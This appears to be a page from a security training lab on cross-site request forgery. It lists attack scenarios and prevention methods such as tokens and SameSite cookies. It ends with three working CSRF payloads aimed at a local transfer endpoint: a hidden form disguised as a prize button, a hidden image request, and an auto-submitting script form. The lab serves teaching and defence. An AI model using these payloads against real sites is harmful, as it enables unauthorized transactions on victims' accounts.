Back to Labs
CSRF Attack Lab
🎯Learning Objective: CSRF Vulnerabilities
Cross-Site Request Forgery (CSRF) allows attackers to perform unauthorized actions on behalf of authenticated users. This lab demonstrates different CSRF attack vectors and modern protection mechanisms.
Attack Scenarios:
- • Money transfer attacks
- • Profile modification
- • Admin action hijacking
- • Token bypass techniques
Prevention Methods:
- • CSRF tokens
- • SameSite cookies
- • Referer validation
- • Double-submit patterns
Attack Complexity
CSRF Protection
DisabledEnabled
Toggle CSRF token validation to see the difference in security.
Transfer Money
Update Profile
Recent Transactions
No transactions yet
CSRF Attack Examples
Money Transfer Attack
HTML form that transfers money when victim visits malicious site
<form action="http://localhost:3000/api/csrf-transfer" method="POST">
<input type="hidden" name="to" value="attacker" />
<input type="hidden" name="amount" value="500" />
<input type="submit" value="Click here to win a prize!" />
</form>Image-based CSRF
Uses img tag to trigger GET-based CSRF (if endpoint accepts GET)
<img src="http://localhost:3000/api/csrf-transfer?to=attacker&amount=100"
width="1" height="1" style="display:none;" />JavaScript Auto-submit
Automatically submits form when victim visits malicious page
<form id="csrf-form" action="http://localhost:3000/api/csrf-transfer" method="POST">
<input type="hidden" name="to" value="attacker" />
<input type="hidden" name="amount" value="1000" />
</form>
<script>document.getElementById('csrf-form').submit();</script>